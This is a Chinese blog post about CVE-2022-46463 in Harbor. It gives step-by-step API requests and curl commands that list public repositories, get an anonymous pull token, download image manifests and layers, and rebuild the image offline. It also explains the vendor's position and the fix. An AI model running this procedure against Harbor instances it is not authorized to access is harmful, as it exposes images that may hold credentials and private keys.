CVE-2022-46463 Harbor public 镜像仓库信息泄露

CVSS评分:7.5

CVE-2022-46463 Harbor public 镜像仓库信息泄露

  • [1. 漏洞原理](#1. 漏洞原理)
  • [2. 漏洞危害](#2. 漏洞危害)
  • [3. 漏洞修复](#3. 漏洞修复)

1. 漏洞原理

Harbor 是一个企业级的 Docker Registry 服务,用于存储和管理 Docker 镜像。当 Harbor 实例被设置为公开(public)时,可能导致敏感信息泄露的风险。攻击者可以通过公开的 Harbor 实例访问到存储在其中的镜像信息,包括可能包含敏感数据、配置文件、私钥等的镜像内容。这种信息泄露可能导致数据泄露、安全漏洞暴露等问题,严重影响系统和数据的安全性。

通过 CVE-2022-46463,读取公开镜像信息并拉取,例子(v2版本):

++1、首先读取公开镜像列表++

读取全部镜像,就是传入一个 / ,但是企业内部的镜像有很多,读取全部镜像可能耗时会很长

bash 复制代码
http://xxx/api/v2.0/search?q=your-search

++2、获取仓库的 Pull Token++

bash 复制代码
http://xxx/service/token?scope=repository%3A这里填你的image镜像名称%3Apull&service=harbor-registry

会返回一个 token 的值:

后续所有的请求,都要带上:

bash 复制代码
Authorization: Bearer $TOKEN

++3、查询 tag 的 digest(即 manifest digest)(这个不用带Authorization)++

bash 复制代码
http://xxx/api/v2.0/projects/镜像名称前半部分/repositories/镜像名称后半部分/artifacts?with_tag=true

我们需要:

  • digest 的值

++4、根据 manifest digest 获取镜像 manifest++

bash 复制代码
curl -sk \
  -H "Authorization: Bearer $TOKEN" \
"https://xxx/v2/你镜像的名字/manifests/第三步得到的digest值"

此处需要所有 layer 的 digest,这些是镜像的真正数据层:

bash 复制代码
sha256:layer1...
sha256:layer2...
...

++5、逐层下载镜像 Layer Blob(镜像内容主体)++

bash 复制代码
curl -sk \
  -H "Authorization: Bearer $TOKEN" \
  -o layer1.tar.gz \
"https://xxx/v2/镜像名称/blobs/上一步得到的 layer 的 digest"

重复此操作下载所有层,得到文件:

bash 复制代码
layer1.tar.gz
layer2.tar.gz
...

++6、下载 config(镜像配置)++

manifest 通常还包含 config digest:

plain 复制代码
"config": {
   "digest": "sha256:cf1234..."
}

同上一步骤,下载 config,到这一步,我们就拿到了完整镜像内容(等价于 docker pull 后 docker save 导出的结构)。

++7、本地还原镜像(离线加载)++

如果你想把这些 API 拉下来的文件还原成一个 docker 镜像,把目录结构做成:

plain 复制代码
manifest.json
config.json
<digest>/layer.tar
<digest>/layer.tar

然后:

bash 复制代码
tar -cvf image.tar manifest.json config.json */layer.tar
docker load -i image.tar

即可完全离线还原镜像

2. 漏洞危害

官方回应明确指出,他们不认为公开的 CVE-2022-46463 是Harbor的一个漏洞,而是Harbor官方文档中所明确定义的特性之一,即用户可以设置一些镜像为公开,该特性导致Harbor上的所有被设置为公开的项目都通过相应的API接口被列举,获取详细信息,甚至被拉取。

测试过程中,如果用户不对项目访问级别勾选"公开"项,则只有项目设置所属账户和admin账户可以看到此类项目,因而所有未认证的用户均无法通过API或前端查询到任何信息。

但由于Harbor的前端界面需要登录认证,针对使用Harbor不熟悉的用户在操作时仍有可能会误用该功能,从而使包含敏感信息的镜像仓库对所有人开放,而用户的初衷可能只是对认证用户开放。

3. 漏洞修复

不对项目访问级别勾选"公开"项

相关推荐
Chockmans2 小时前
春秋云境CVE-2021-42897(保姆级教学)
计算机网络·安全·web安全·网络安全·安全威胁分析·春秋云境·cve-2021-42897
风控PM说5 小时前
入门第二课:业务催生风险,常见的业务风险有哪些?
安全
四月天4317 小时前
web安全-SSTI(服务器模板注入)
笔记·学习·web安全·网络安全
菩提小狗19 小时前
每日安全情报报告 · 2026-07-04
网络安全·漏洞·cve·安全情报·每日安全
独守一片天20 小时前
HarmonyOS 6.1.0 Call Service 来电识别与安全通信怎么设计?
安全·华为·harmonyos
想你依然心痛1 天前
嵌入式C代码规范:MISRA-C 2012核心规则解读——类型安全与未定义行为深度剖析
c语言·安全·代码规范
Elastic 中国社区官方博客1 天前
跟踪资金流向:使用 ES|QL 和跨集群搜索追踪洗钱网络
大数据·人工智能·安全·elasticsearch·搜索引擎·金融·全文检索
IT新视界1 天前
数据要素安全流通服务
安全
微信开发api-视频号协议1 天前
Codex++安全边界探秘:从模型能力到风险防御
前端·安全·微信·企业微信
枝头玉1 天前
新160个CrackMe048-monkeycrackme1、049-THraw-crackme8、050-daxxor逆向分析
安全·逆向·crackme·reserve